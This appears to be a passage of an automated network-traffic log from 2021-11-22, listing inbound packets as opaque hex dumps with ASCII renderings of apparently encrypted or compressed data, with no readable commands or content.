2021-11-22 13:07:59 UTC	119	IN	Data Raw: 1b 37 0d 24 09 d2 52 79 3b 2c cc 1d 41 0f 4f 1e 93 c0 91 3d bd 90 5d 5f b4 a3 1d 8d a0 4d 47 42 02 86 52 95 56 a9 24 9e 1d 0f bb d1 58 bb 28 b6 8b 80 06 6c c0 17 2d 62 7c 3d aa 8e 55 e5 3a 3e 5b cc 59 16 81 b9 d5 ff b1 ca c0 5d 43 63 26 4e af 88 7f 12 6e 55 5b d4 90 99 4c 6f 0d 7d 29 2b 13 f7 ab 2a 99 2d 63 26 a2 2e df 6f bc 34 49 5f 45 a2 8b ef ff 06 d6 1d d2 b2 50 15 76 37 43 fd 54 72 91 18 ae a9 fa b6 ec c6 1b c2 32 81 97 a3 91 57 e9 78 0c 39 ce 70 76 d9 74 b4 f8 3e c2 15 2d 27 d9 9d c6 21 11 7f da 96 f6 ff 98 a9 53 47 e6 21 73 f5 09 88 d2 72 10 71 d5 d8 4c c7 ac c6 0d c2 ca 3a 4b ff 6d 76 2e b7 10 0b 79 fb 21 3c 4d 15 bb 1b f4 f6 e3 03 33 61 38 f1 48 19 6c 4f 5e 15 5f 19 74 b2 4d 50 17 f1 81 c2 f1 a7 b7 59 76 d1 8c 54 71 17 f2 44 43 9e a3 ff 9f ee 4c Data Ascii: 7$Ry;,AO=]_MGBRV$X(l-b\|=U:>[Y]Cc&NnU[Lo})+*-c&.o4I_EPv7CTr2Wx9pvt>-'!SG!srqL:Kmv.y!<M3a8HlO^_tMPYvTqDCL
2021-11-22 13:07:59 UTC	120	IN	Data Raw: 5c 2e b2 27 25 c3 fa 9b ff eb 2e 28 2b ab 51 6e 9d db 62 1b 7a 1e b3 58 f4 a6 58 a0 d1 c8 71 c2 c4 91 d6 0d b6 99 99 e9 e8 f8 ee f3 77 be c5 41 62 ab 96 47 5e 03 87 e7 a5 45 06 03 f3 84 a3 8f 73 30 19 b1 e8 b3 60 82 9c 2c 3d 17 08 20 19 95 6f 17 b7 ed 49 75 b3 98 fc 06 6e ec 02 bb 85 a8 34 79 ab ac 8f 2f 78 d5 03 3f fd de 63 96 2d 5c 0b cf 37 02 57 fb 20 29 46 91 ca 3b b5 41 4c 66 1f 1b 41 0d cb f4 eb 61 ca 77 56 40 8e 51 c7 4c cd 59 fd b9 40 a7 df a4 42 50 4c db 16 78 d9 6d c9 16 06 95 fb 66 31 ae f8 23 16 aa 6c 2d a5 da 8b ad 9d c6 dc 1a 51 4c 5f c3 d0 9f f6 05 cc 50 92 ee 80 69 fc dc 9e 1e 39 dd 29 a2 90 ef cd 7c db 60 c7 1c 48 91 fa dc ff 46 3a ac 90 65 dc 13 3c bd 12 c0 95 aa 9e 18 0c e1 88 aa 46 52 03 43 6a 3d ec 80 1e ad 6c 90 b6 84 c0 24 7b 31 51 Data Ascii: \.'%.(+QnbzXXqwAbG^Es0`,= oIun4y/x?c-\7W )F;ALfAawV@QLY@BPLxmf1#l-QL_Pi9)\|`HF:e<FRCj=l${1Q
2021-11-22 13:07:59 UTC	122	IN	Data Raw: 30 55 18 ce a0 8b e3 c8 18 c7 0a d8 8b f2 0a 7b c3 7b 1c 42 63 94 39 91 84 39 b3 c4 e4 0c 4f 3f a9 02 a2 82 7d eb 50 05 21 51 58 76 c8 62 09 fd e0 d7 2d 18 1e 73 8c cc 3c d3 38 f5 97 f6 f3 e0 a3 55 47 ec 38 0f 5c 19 a9 ce 0b 15 4f d5 d2 5e 61 a2 f2 0a c1 de 03 ff e4 93 7d 16 96 ad 9b 79 fd 3c bc 56 06 ac 1a f6 c3 ed 32 db 77 98 d0 59 10 7c e7 20 db 49 0d 6a f5 69 51 17 f1 8d 85 ba a5 b7 55 0e d5 8a 54 7b 1a fe 73 41 aa b5 f8 04 ce 57 c7 75 94 e4 66 51 aa 9c 91 40 59 2f 39 9b ac 8c fc e3 0e 7e 99 ff e8 17 71 e6 2b 12 bd 10 5e 6b 36 99 b8 92 b1 fb 97 87 92 bf 7c a8 ad af 93 48 8b 93 f7 84 ff 58 cb 73 6e 9b f4 99 5a 76 0c 81 bf a1 bd 74 33 d3 ff 2e 11 70 28 12 6c 24 6f 13 55 08 e3 cf d2 fb b4 b8 ad 2c 60 25 90 66 81 21 e6 5e 3a 8f f1 06 e7 50 92 39 97 18 9b Data Ascii: 0U{{Bc99O?}P!QXvb-s<8UG8\O^a}y<V2wY\| IjiQUT{sAWufQ@Y/9~q+^k6\|HXsnZvt3.p(l$oU,`%f!^:P9
2021-11-22 13:07:59 UTC	123	IN	Data Raw: 92 3a 39 c9 e8 0f 06 39 07 21 3b 65 ae 42 e8 b7 4b ca 23 e1 1a 5a 18 c4 ea e6 78 8d a3 53 40 8e 51 25 9a cf 59 f6 c2 a8 b2 f7 01 5a 3f 97 f1 3e 77 b6 95 de 3e e8 84 f5 7d 2e cc a0 0a 3e aa 7d 24 9b 4b 8e ad 9b d4 c3 7d 67 66 fc c5 c3 85 cf 3c c1 3f bc fa a8 87 ef cc 85 3a f8 f2 2c a8 87 db f7 56 f3 62 ef f1 5c 1c f7 b3 db 45 2e be 95 5d 6e 18 14 9a 3f ea 96 82 b6 0c 24 0f a2 41 4e 7a e0 2e 4c 35 c4 33 0f bd 65 d3 81 97 dc 36 55 a7 42 70 7f cd 42 16 90 77 a5 34 bd 96 f0 ea 83 cb 35 3c ba 53 3d ff 4d 95 3a 34 7f 3c 2a c3 ac 36 89 9f 6c ac 8f a1 ca 96 73 8c 7f be 42 45 a1 97 24 1b 6f 5f ca 7e 1b 02 19 b4 ec e1 71 69 83 a2 9c 08 59 e5 78 d6 83 8f 36 c7 10 d5 d5 c9 6d e6 95 37 61 06 95 39 2e ea f5 2e 33 4c 58 e6 1c 30 14 69 b8 d0 d1 d2 4e 4b d4 5b 7a 7a 1b 30 Data Ascii: :99!;eBK#ZxS@Q%YZ?>w>}.>}$K}gf<?:,Vb\E.]n?$ANz.L53e6UBpBw45<S=M:4<*6lsBE$o_~qiYx6m7a9..3LX0iNK[zz0
2021-11-22 13:07:59 UTC	124	IN	Data Raw: b2 e4 48 58 71 ed 4f 37 4b 0d 60 9a ee 50 17 e2 94 ea 32 bd b6 5f 61 4c 8b 54 71 0c e1 67 53 e7 b7 17 06 9d 4c 39 76 ba c4 0a 38 c4 60 94 42 5b 44 2a 4b ae 88 dc 8c e1 4f 9d f9 1a 78 a0 e4 23 19 d2 ff 5d 95 25 c7 a9 8d af ea fe b2 83 a8 67 c7 2d af bf 45 b1 39 ba 84 ff 45 f0 74 79 9b ef a6 45 7c f2 8a ee cc ad 71 1f c6 e9 d0 16 5c e2 ec 99 dd 5c 32 44 1c 6d 69 b8 64 b9 46 a8 02 6b 66 b0 66 81 25 d1 0b 2b 98 fb 6a 8f 4b 6c 3c b8 04 e7 f0 c8 44 71 ca 03 56 9a c7 d4 09 3e b4 10 09 0f 1e c4 41 f7 18 fa 79 29 84 98 e8 16 43 b5 98 e4 3a ca 44 37 8f 04 14 b9 6d e5 e0 8b 8e 80 fc 51 12 28 71 2c 9e 84 5c 0c 42 78 8b 24 1c fc 5b 56 e2 a1 5a 0d 4c 61 71 9b 84 10 a4 3c 94 57 02 6e e9 c8 5f 63 91 bb 6d 1f 17 b6 24 92 82 b6 53 23 10 4e 8c 1e 23 57 78 68 09 a7 f9 5c 31 Data Ascii: HXqO7K`P2_aLTqgSL9v8`B[D*KOx#]%g-E9EtyE\|q\\2DmidFkff%+jKl<DqV>Ay)C:D7mQ(q,\Bx$[VZLaq<Wn_cm$S#N#Wxh\1
2021-11-22 13:07:59 UTC	125	IN	Data Raw: 37 22 a1 60 74 35 25 a8 2f f5 83 82 b5 0c 24 0f a0 fc 32 e3 eb 41 6e 2d 5e 10 33 a7 40 a6 b4 bd c6 18 7e b4 52 19 4d 9a 3c 85 4f 78 84 07 10 b3 dd ea b6 c4 02 28 a0 7b 1a 23 4d 82 1a 79 d7 b6 21 d2 a2 3b 04 84 34 59 56 42 c4 b3 7b 56 44 86 51 50 b6 ab f0 d2 c9 b5 37 85 f9 9e 16 99 a6 f3 6c 76 bf bd 93 20 27 e7 78 d0 a2 d5 48 5e 4f d5 d1 d7 e5 c3 b8 3c 5d 18 8a 73 31 e7 dd 03 ac 4c 5e cc 13 4f 8d 68 b2 d6 ce db db 6e f9 57 46 65 12 2e 3a b1 04 fa 79 14 a3 2a e6 75 33 be 09 1f 97 d5 8a ae 8e 95 75 7c ab af 6d 63 be 46 69 00 98 86 54 b5 03 c6 b9 97 72 fc a5 da c4 93 14 ba b9 b7 e2 77 af 08 12 c2 79 3d ac a5 24 85 b2 21 4d e0 63 1f 1b 9a 5a e2 89 c1 d8 56 19 df 3a 66 88 9b 78 00 6c d4 21 4d 97 8e c5 77 00 e7 0d 15 03 c0 ab 31 91 85 66 26 a4 93 c4 58 85 22 5d Data Ascii: 7"`t5%/$2An-^3@~RM<Ox({#My!;4YVB{VDQP7lv 'xH^O<]s1L^OhnWFe.:y*u3u\|mcFiTrwy=$!McZV:fxl!Mw1f&X"]
2021-11-22 13:07:59 UTC	127	IN	Data Raw: 13 55 28 77 b6 f6 7f 39 59 2b c3 a4 c7 e4 b8 59 a6 28 44 1f 30 61 ab 4b 87 ca 28 98 f5 08 c5 d0 49 15 b5 34 fa be 97 c1 73 ce 01 33 32 eb d6 0d 10 73 78 77 9c 1b d0 bb e9 38 9e 5d 0f 8d 92 da 22 67 b7 2d 99 b8 d3 6c 1e 8f 06 69 11 06 9b 7d a2 d6 86 e3 6c f5 8c 5d 22 bc 9f 7d 2e b7 fb 8a 24 01 d6 0d d6 e3 a7 74 4f df fa 70 91 85 1b 62 a7 a7 84 0d 44 fe dc 38 f0 96 35 da 79 bb 9a 26 96 86 9e 42 d9 88 4f 88 32 64 6c e2 47 59 2a de 43 0c ba a5 27 c3 f0 af e3 c7 2c 22 59 93 3b 10 1f 5a 2e 1e 65 20 57 31 d8 a8 7a b5 36 1e ef c0 c4 b4 e3 12 9b 9b 93 fc d0 86 9a 42 4e be c1 54 84 d3 b1 6a 50 27 b0 fb 80 e6 02 2b d7 9d 8b a8 59 01 1f 9b 8c f4 30 81 9c 28 34 a6 b9 05 34 9b 5a 13 89 e5 c8 72 b3 9e cb 2b 46 c1 0a c8 70 83 5e 01 21 b9 9e 3f 08 19 98 1a d6 bf a3 8b 10 Data Ascii: U(w9Y+Y(D0aK(I4s32sxw8]"g-li}l]"}.$tOpbD85y&BO2dlGY*C',"Y;Z.e W1z6BNTjP'+Y0(44Zr+Fp^!?
2021-11-22 13:07:59 UTC	128	IN	Data Raw: e7 25 d1 d5 c9 60 ef bd 1a 79 06 93 12 40 94 6c 2f ae 48 47 82 eb 14 39 66 94 cd b5 f2 35 4f d4 5b 7f 5a 33 1c 60 ae 0e f8 3e 68 3a 2d cc 13 52 42 92 3a be c4 a6 2b ce 98 ed 5e b4 a5 6e 2f 8c 4f 41 2b b0 e8 2c 06 5c b8 24 89 14 62 9f fc 51 90 26 d7 bf 32 ed 68 c0 0e 2a c7 56 3f aa 89 6c 91 55 b9 4c e4 78 0c e6 25 52 c3 a1 f8 cb 2e 4b 6a 22 4e a5 82 50 2b 44 ba 59 fe f8 f0 58 69 0d 79 37 50 96 c3 99 33 97 14 0e 06 0b 88 ce 70 b7 2f 75 5a e4 a2 8d cf bd 45 4d 1c d8 9e fa 7c ec 18 57 3e 73 6d f8 31 04 85 39 b5 f7 e8 21 4d 35 87 bd cc fc ee f9 58 1e 30 28 d5 53 f4 7a 30 f6 74 f6 c2 3d 0f 7a 82 e3 03 28 55 19 93 dc 97 f1 bd 55 47 e2 3f 0b 4e 3d 84 cb 42 83 25 f5 30 49 65 bd f8 12 fe f3 10 e8 f9 47 12 44 06 d2 08 7d e2 5a 2b 6f 38 b4 3c f8 b8 d2 d2 21 76 b4 d1 Data Ascii: %`y@l/HG9f5O[Z3`>h:-RB:+^n/OA+,\$bQ&2h*V?lULx%R.Kj"NP+DYXiy7P3p/uZEM\|W>sm19!M5X0(Sz0t=z(UUG?N=B%0IeGD}Z+o8<!v
2021-11-22 13:07:59 UTC	129	IN	Data Raw: 1b 21 77 2f a4 89 8c 62 e1 e4 38 28 93 35 da 7d bf 9f 09 94 80 b2 02 25 6f d7 89 36 7f 75 e8 62 74 24 62 79 18 8b 15 05 53 f0 b3 cb ca 5b 25 5f b9 4b 46 ab 59 2e 1c 50 98 b3 8d f4 a6 58 8a 9d 3e 73 c2 5e 91 d3 2b 90 b9 02 fa fa ec c4 a2 48 be c5 51 97 64 96 47 58 2b 2d be 39 44 00 2f f7 16 a3 85 5b 9b 3c 9c f3 ac 89 12 9c 2c 2b ba 5e 27 19 94 64 24 98 c7 6e 76 99 1c aa bb 6f ec 0c e8 e5 a9 34 7f 22 9d b3 2a 31 04 91 3f fb b1 a5 eb 2a 56 18 f7 27 21 54 fb 26 11 e1 c7 b4 38 b5 4f e0 d8 1f 1b 5a 84 f2 c8 e6 53 c2 cb 52 40 88 67 cc 4c cd 59 e2 85 79 b1 f7 01 68 d2 38 6a 3f 7d dd 4b 4a 3e ee 97 61 49 0d a3 ca 2b ab ae 6c 2b 93 d9 8b ad 9d d0 e0 23 47 64 fa e9 52 eb 47 2d c9 54 b4 6e a8 81 fe 46 b1 1b c1 f9 09 3e 81 f3 d9 74 7c 63 c7 1a 49 34 d0 de ff 41 04 3a Data Ascii: !w/b8(5}%o6ubt$byS[%_KFY.PX>s^+HQdGX+-9D/[<,+^'d$nvo4"1?V'!T&8OZSR@gLYyh8j?}KJ>aI+l+#GdRG-TnF>t\|cI4A:
2021-11-22 13:07:59 UTC	130	IN	Data Raw: d4 d3 4e ed 37 68 85 2f 78 06 46 9a f2 dc 96 8e da 40 20 7f 28 3e 26 64 ca a5 b0 0b 62 06 13 8c ce 70 32 05 70 66 c0 82 3c e5 d7 3b f4 af d0 9a e5 02 5e 10 78 30 53 58 13 6f 23 80 39 b1 cc 78 0c 4f 35 1b b2 8f 93 51 d8 e0 1a 2f 42 6f c5 d1 75 16 f3 36 fb 03 39 09 50 1f b8 b2 04 57 1d b5 4f f9 8f 24 ce 62 cb 31 46 f4 a1 a9 c4 64 bc f9 dd d8 4d 72 95 ca 1b d6 d8 38 6a 81 f4 7d 3a 9b f3 b2 79 fd 36 2b 6f 38 aa 3c c7 6e f2 21 25 56 0c c6 48 19 77 c5 62 35 4b 0b 4a 18 90 c9 16 fb 91 ca 89 a4 b7 5f fb 79 a6 45 57 36 5a 67 52 bd 95 55 1b d1 4c 25 5c 95 c5 77 45 ef e6 ee d9 5e 39 52 6a 12 8c f6 8c 68 5a b4 eb d6 58 1c e4 2b 18 f2 2c 57 6b 30 95 a4 a5 80 ea 80 81 a9 2e 1d 23 52 ae bb 61 0e e9 f7 84 65 62 f5 72 5f bb 58 8e 45 7d d2 4f 9b b1 ac 6e 00 ed d0 2c 17 4c Data Ascii: N7h/xF@ (>&dbp2pf<;^x0SXo#9xO5Q/Bou69PWO$b1FdMr8j}:y6+o8<n!%VHwb5KJ_yEW6ZgRUL%\wE^9RjhZX+,Wk0.#Raebr_XE}On,L
2021-11-22 13:07:59 UTC	132	IN	Data Raw: 2b 9c 09 a6 67 0d 7d 0c b1 e5 b3 70 b3 9e 4e 07 43 fe 2e e8 ab a9 34 7f 98 02 92 3b 17 3b 23 17 d6 b3 85 92 07 d0 66 73 0e 0c 52 db fe 3b 63 b9 b7 1c 98 59 e6 6c c1 1b 5a 1e f7 3e fb 75 e2 40 73 68 a5 45 4a 4d e7 df 82 34 55 b3 f3 27 9d 50 46 f3 a4 58 f4 79 f9 1e 31 97 fb 6c 00 4e e0 0b 3e b1 4e 03 9e 55 8c ab b7 41 b6 97 44 64 f8 e3 30 95 de 2c 53 75 b9 ea 8e a1 1e dc 94 36 f0 c1 24 a8 81 ec fb 7c de 66 c7 1c 74 9a 83 45 fe 47 2a 98 65 4d 7f 13 a6 92 17 f8 b6 8a 79 0e 24 09 aa ea 41 7a ea 5e 48 1f e9 37 1e ab 4c 3e d5 0c dd 30 57 96 b0 1f 67 cc d8 39 63 69 a6 3c 68 96 f0 e0 b0 bd 10 04 ba 4e 1f 0c 4f 84 36 09 2f 51 b9 d3 a6 23 be 42 19 52 70 c4 fe ae 76 7c 4c 48 53 50 b0 a1 c3 a1 50 b4 28 a2 cc 29 31 b4 ab ff f7 17 1a a3 9c 0c 2a 01 78 d6 88 15 13 ea 5c Data Ascii: +g}pNC.4;;#fsR;cYlZ>u@shEJM4U'PFXy1lN>NUADd0,Su6$\|ftEGeMy$Az^H7L>0Wg9ci<hNO6/Q#BRpv\|LHSPP()1x\
2021-11-22 13:07:59 UTC	133	IN	Data Raw: 62 b6 cc ab 41 4c 65 b9 c7 1d d7 de 12 72 da 40 6d 1c bf d7 09 79 fd 16 43 44 15 bb 00 cf f9 f0 21 23 5c 36 b0 d1 18 6d e9 6f 32 4a 0d 60 00 cb 7d 06 dd b5 ef 33 a4 b7 7f 97 52 8b 54 6c 3e cc 65 52 bb 9f 6b 6d 48 4d 39 70 98 c1 76 43 c5 fa b5 6d 4e 1f 76 4c af 8c f6 ac 0f 71 99 f9 eb 50 8d e6 2b 1e f8 6c 21 f2 31 8a ad ad aa e9 80 87 19 8d 4e ab 75 8e b8 40 b3 e9 d7 86 f0 47 d8 7c 51 b6 e7 8e 43 57 74 fe 0a b0 ac 75 3b cd fc 2e 17 d0 39 c0 81 fd 50 17 47 1f e3 fe cd eb b8 46 b3 18 41 30 32 67 87 0b 7f 2d b0 99 f1 13 d0 43 6d 38 bb 88 c0 a6 a5 63 51 c7 00 2d 1a e6 f4 02 16 59 0d 12 2d 37 d2 bf f0 24 86 06 bb 82 b4 c1 34 4d 3a 2f 99 22 ee 69 22 ab 26 65 3a 6c e5 c4 98 d9 82 fc 47 47 84 72 2c 9c aa cc 70 a0 f8 8a 20 38 f5 21 d4 e3 3b 7b 08 b3 45 51 9a 80 04 Data Ascii: bALer@myCD!#\6mo2J`}3RTl>eRkmHM9pvCmNvLqP+l!1Nu@G\|QCWtu;.9PGFA02g-Cm8cQ-Y-7$4M:/"i"&e:lGGr,p 8!;{EQ
2021-11-22 13:07:59 UTC	134	IN	Data Raw: 64 fc dc da bd f3 2e c9 56 be 7e d6 18 ff dc 90 16 fb de 29 a8 1b d6 f4 46 d5 44 ec 1b 5e 1c dd 17 ef 47 2e a7 8d 65 52 11 3c b1 10 6c ee 33 99 0e 20 29 a6 ab 4c 7a 70 64 47 25 e2 15 32 ac 66 bc 8b 41 cc 30 53 a9 72 37 4a ce 42 1a 64 fa fe 85 8b 96 f4 c0 bd de 1d 04 20 76 1a 30 6b a4 1d 22 a9 2f 00 26 b6 27 9e bf 31 7f 72 5e dd a9 e2 24 f5 aa 53 54 90 af ab ac 50 2e 12 ac f6 22 13 9a ac d5 71 49 7f b2 9c 08 15 f2 50 fb 8a 8f 30 ed c8 ab 4c c8 7f e2 b5 18 7a 06 95 a2 0b c7 e7 08 8e 63 59 e6 71 11 07 78 b2 d2 ce c4 69 66 d6 5b 66 50 9d 4f fb af 08 d6 74 26 a2 2c cc 8d 68 0a 1a 39 b3 fa 81 34 ab 98 50 4b b4 a5 6d 0b 89 60 43 2d 9c ac d4 e1 c4 b9 20 92 52 c9 bb d1 5e 2c 1c 9c 8d 8e c9 59 c1 11 3a cf 4e 2c aa 8f 59 f2 03 0d 4f e4 7a 39 03 c1 ee ef af da f4 7b Data Ascii: d.V~)FD^G.eR<l3 )LzpdG%2fA0Sr7JBd v0k"/&'1r^$STP."qIP0LzcYqxif[fPOt&,h94PKm`C- R^,Y:N,YOz9{
2021-11-22 13:07:59 UTC	136	IN	Data Raw: e8 80 1d a6 85 71 9c 73 ff be 41 b3 c9 17 97 ff 47 c7 44 51 b6 e7 8e 43 57 70 fe 0a b0 ac 75 3b 97 fc 2e 17 d0 39 c0 82 fd 50 4d 47 1f e3 fe c1 f0 b8 46 b2 28 44 1f 30 61 ab a7 87 ca 28 98 f5 37 a3 4b 6c 38 21 37 c8 99 91 65 22 cf 01 2d 3a ca c0 0d 16 46 02 21 28 18 d0 b9 dc 88 7a e1 23 83 b0 e5 40 46 3b 2f 03 9d e6 56 15 ad 52 6e 3b 6c c5 f8 b7 d6 82 e3 4b 47 84 72 2c 9c aa cc 70 a0 f8 8a 20 38 ab 21 d4 e3 3b 7b 08 b3 45 51 c4 80 04 5a 1d ae bd 03 62 fe ef 30 4c 96 35 dc 48 15 c9 bd 97 80 b0 08 f1 10 4e 88 ac 5e 78 6a 44 54 72 f9 5c 35 ba 04 31 c3 f0 ac de c2 03 20 5f bf 7b ec f8 c2 2f 1a 7e 3a 9a 15 f5 a6 c6 8f 21 2f 55 e2 93 b5 fe 3a 96 d5 87 fa fa f1 cc f6 4d be c3 61 3d 37 0d 46 5e 05 8f 98 a1 45 00 b1 f2 a9 b2 a3 7b 59 18 b1 e2 aa fa 94 9c 2c 31 b2 Data Ascii: qsAGDQCWpu;.9PMGF(D0a(7Kl8!7e"-:F!(z#@F;/VRn;lKGr,p 8!;{EQZb0L5HN^xjDTr\51 _{/~:!/U:Ma=7F^E{Y,1
2021-11-22 13:07:59 UTC	137	IN	Data Raw: a5 1a 65 5a 68 8b 2b 51 b0 81 30 89 7d a6 11 a1 9c 05 33 b4 8d ea 67 69 83 bd 91 20 27 e7 78 d0 a2 0d 48 5e 4f d5 d1 e9 06 e7 95 37 e1 23 b8 29 08 ca 8c 2f ae 4c 78 aa 67 31 14 75 9a ff d3 d2 47 61 52 25 f9 7b 1b 35 42 d4 09 d2 54 8c 86 01 de 31 6d 5d 09 1f 93 ea d2 22 ab b8 66 4b 9c 88 70 07 a7 67 c7 53 03 87 52 9b 7d c3 21 96 72 62 9f fc 4c 90 19 ca 9e a8 e9 48 a3 07 3a ef 64 23 82 a2 44 fb 2d 0a cb 9a e5 12 81 bb 57 92 ae de d4 d3 4e ed 34 68 85 e5 79 06 46 9a de c2 96 8e de 66 25 50 2a 38 0a cc 36 42 28 0a 66 22 84 f1 cf 70 a8 ba 78 5a f7 84 ab 98 d6 3b d4 3d 57 8c e5 15 68 15 57 32 55 74 bb 97 c4 18 38 b5 e8 e0 72 4e 35 81 0d 87 af 65 de 78 64 2e 42 4f 56 4e 63 16 e9 01 d8 29 14 0d 7a 9b ec ad 7b ce 18 95 f2 d9 f0 25 54 47 7c 05 4d c6 3e 89 bb 65 9c Data Ascii: eZh+Q0}3gi 'xH^O7#)/Lxg1uGaR%{5BT1m]"fKpgSR}!rbLH:d#D-WN4hyFf%P*86B(f"pxZ;=WhW2Ut8rN5exd.BOVNc)z{%TG\|M>e
2021-11-22 13:07:59 UTC	138	IN	Data Raw: 06 70 32 44 c8 e6 a3 d0 a8 7e 25 f6 a8 70 28 ba 1f 4b 0e 39 63 af 09 09 d8 00 4b e2 a1 5e 05 ea 7b 71 91 99 2c 77 3f 82 af 29 e0 9f 7d 19 61 90 15 7a 63 93 b7 be b3 ad a5 0e 87 b1 4f 88 36 5b 18 60 62 74 3a d0 71 37 9a 35 0f 45 8e 2a ca ea 2a 02 fe b8 51 6e 1c 7e 03 08 5c 3a 6c 15 f5 a6 7c ff 14 3e 73 dd d5 9c d3 38 b6 9f b9 78 84 75 e5 db 4b 9e 67 4a bf 49 0e 62 73 10 89 e0 02 44 00 2b f7 e2 bb 85 5b 1d 31 9c e0 8a af aa 1a 52 b2 9b 23 24 39 37 7d 0c b5 5f 4b 5d a1 b8 f4 81 6f ec 08 e8 1a b1 34 7f a7 b5 b6 16 15 24 04 15 7d cf 1c 95 2d 52 38 4e 0e 0c 56 61 05 16 71 9f 0d 9d b4 4b c0 6c 66 03 5a 1e c8 eb df 58 e0 5f 54 6a 0e 39 d3 4a cd 5d dc 08 55 b3 f7 9d 67 7d 54 d5 1e d8 d8 6b df 1e 69 8f fb 6c 3f bf c4 26 3c ae 6a 01 31 29 15 ac 9d c3 e8 a8 44 64 fc Data Ascii: p2D~%p(K9cK^{q,w?)}azcO6[`bt:q75E**Qn~\:l\|>s8xuKgJIbsD+[1R#$97}_K]o4$}-R8NVaqKlfZX_Tj9J]Ug}Tkil?&<j1)Dd
2021-11-22 13:07:59 UTC	139	IN	Data Raw: 8e 5a d5 b8 d1 58 9c bf cf 06 a9 e9 6c e0 d7 3b ef 7b a7 8f a2 54 dd 0b e6 4c e4 7c 33 74 a6 77 ee b0 c3 fc 64 69 c0 20 64 27 e7 e1 07 46 be 7f 13 97 8e c1 f2 28 50 39 1e 2c 21 b5 3c b1 2b 74 3c a4 8c d2 58 85 22 5d 71 cc 20 f5 7c d6 3b d0 3d 10 9b e5 15 ec 18 57 21 73 52 59 10 ba 81 19 ad f6 c0 0c 51 1d ac 95 a2 84 5d 7e 26 83 2e 42 4b 56 10 74 16 e9 84 f3 2c 2b 29 5a 54 c7 2b 05 77 39 8f f6 f9 90 2d 7c 6a e4 20 66 fe 9e d7 5d 65 9c 4a f5 12 4c 65 bd 7d 3c fb cc 34 c8 35 6c 7c 3a bf fa 12 79 fd 29 a5 62 38 b9 1a e1 fe 70 5f bc 77 b4 ca 68 d2 6c ed 4f ad 6e 20 71 bc ce 9b 16 fb 95 ca 0f be b7 5f 78 74 a6 56 71 10 cb e5 2c 24 b4 e9 17 f1 80 38 74 b8 5d 52 6e d4 46 b0 8c 5e 39 56 6a ee 96 f6 8c e9 57 b4 fb f0 7e 8a 66 55 81 d3 ee 5b 4b fd 8b a9 8d 37 cd ad Data Ascii: ZXl;{TL\|3twdi d'F(P9,!<+t<X"]q \|;=W!sRYQ]~&.BKVt,+)ZT+w9-\|j f]eJLe}<45l\|:y)b8p_whlOn q_xtVq,$8t]RnF^9VjW~fU[K7
2021-11-22 13:07:59 UTC	141	IN	Data Raw: e1 fa ec fb f6 67 93 c7 4b b9 63 12 39 c7 00 af c4 80 a8 01 2b d7 1e 86 a8 49 27 39 5c e3 8a a9 a0 71 37 2b 9a 3c 12 31 b9 7e 0c b3 ef e8 0e 2a 9f d4 26 4e 02 09 c8 76 33 11 52 aa 9e be d5 16 24 02 1f e4 ad 85 94 32 5c 30 c7 0d 0c 50 d1 a6 45 fa b8 2d 3d 95 a4 c1 4c 1f 81 7f 33 c5 c3 d7 9a e3 5f 52 60 a1 5b 4a 4b d2 52 d4 80 56 b3 f1 2d c0 2e df f2 3e 79 f9 9b de 3e ee 0d de 41 31 94 cc fb 3f ae 6c 0b 87 4b 8c ad 81 ef e5 0c 45 62 d6 41 ae 0c df 2c cd 70 65 f9 a8 81 64 f9 b9 27 f6 ff d8 a9 81 f3 f9 6e ef 64 c7 07 76 31 ff dc f9 6d ac c6 1d 4c 7f 17 1c 45 3b ea 90 30 bd 23 35 2f aa 58 4d 7a ea 61 2b 2b c4 35 00 85 4b be ab 93 f6 b2 2d 2f 53 1f 63 ec b1 1d 4e 78 1a 39 a7 87 d6 c0 63 de 1d 04 9a 1a 2b 21 4d 99 18 0e ab 2f 26 f8 20 59 07 a0 19 56 50 aa da 83 Data Ascii: gKc9+I'9\q7+<1~*&Nv3R$2\0PE-=L3_R`[JKRV-.>y>A1?lKEbA,ped'ndv1mLE;0#5/XMza++5K-/ScNx9c+!M/& YVP
2021-11-22 13:07:59 UTC	142	IN	Data Raw: 1a 2f 62 8b 6b d9 75 09 c0 36 fb 03 39 09 50 1f b8 b2 04 57 1d b5 e2 fb 8f 24 ce 62 cb 31 46 f4 0c ab c4 64 bc a3 c8 d8 4d 7b 95 ca 1b d6 d8 38 6a 81 f4 7d 3a 9b f3 1d 7b fd 36 2b 6f 38 aa 3c c7 c1 f0 21 25 56 41 d3 48 19 76 c5 62 35 4b 0b 4a 1c 90 c9 16 fb 91 ca 24 a6 b7 5f fb 79 a6 46 57 36 f7 65 52 bd 95 13 0e d1 4c 26 34 90 ea 75 43 c3 4a 16 3e c6 38 56 4e 8e 9b f4 8c f2 e5 bc d4 e2 5e 80 f3 29 18 d2 ce 65 75 30 8a b6 84 85 c5 82 87 85 82 e5 c4 ca af bf 45 93 f1 f5 84 ff dd fd 4d 6b bd c5 96 47 7d f2 a0 d0 af ac 71 04 c9 d5 03 15 4a 1a c7 11 a5 e9 1e 46 1b c3 c7 c7 e4 b8 dc 89 2d 78 3b 10 7e 83 21 f9 73 66 86 f1 17 e9 62 41 3a bb 14 cf 09 c9 dc 70 ce 05 0d 00 c4 d4 0d 8c 7c 3f 18 23 3a ca bd f6 0e 24 2a 3c 83 b4 dc 3c 6a 39 2f 9f 92 49 3a aa 8c 06 6b Data Ascii: /bku69PW$b1FdM{8j}:{6+o8<!%VAHvb5KJ$_yFW6eRL&4uCJ>8VN^)eu0EMkG}qJF-x;~!sfbA:p\|?#:$*<<j9/I:k
2021-11-22 13:07:59 UTC	143	IN	Data Raw: ce 96 da 15 64 70 7c f1 3e 7d f9 10 fe 3e ee 88 d4 44 0d b0 ec 0d 14 28 12 b2 b2 57 88 8d a6 c5 c8 0e df 41 d1 d1 f6 b5 e5 2e c9 50 b4 52 89 81 fe c3 82 1e fd dd 29 ae ab 75 a7 cd f2 64 c3 3a 62 1e fd dc 65 62 03 aa a2 6d 43 11 3c b7 1a 2a b1 aa 98 11 28 21 a7 a8 4c 7c c0 c3 14 ae c5 35 1a 8d 5b be ab 95 46 15 7e a7 74 3f 5a ce 42 1c 6e b4 a1 1c 8a 8c d8 cd 92 df 1b 2e 38 2d ae 20 4d 80 10 1d ab 2f 20 48 83 0a 8f 87 39 6c 72 5e db a3 b4 7b 6c ab 4e 78 9d 83 aa aa 7a 36 49 18 e5 04 37 94 92 d7 71 69 19 87 b1 19 2c c5 47 d4 88 8f 16 10 6f d5 d5 d7 57 cb 97 37 7d 2c 17 46 b7 eb f5 2a 8e 0c 5a e6 71 ab 31 44 a3 f4 f1 92 43 4b d4 7b bf 5b 1b 31 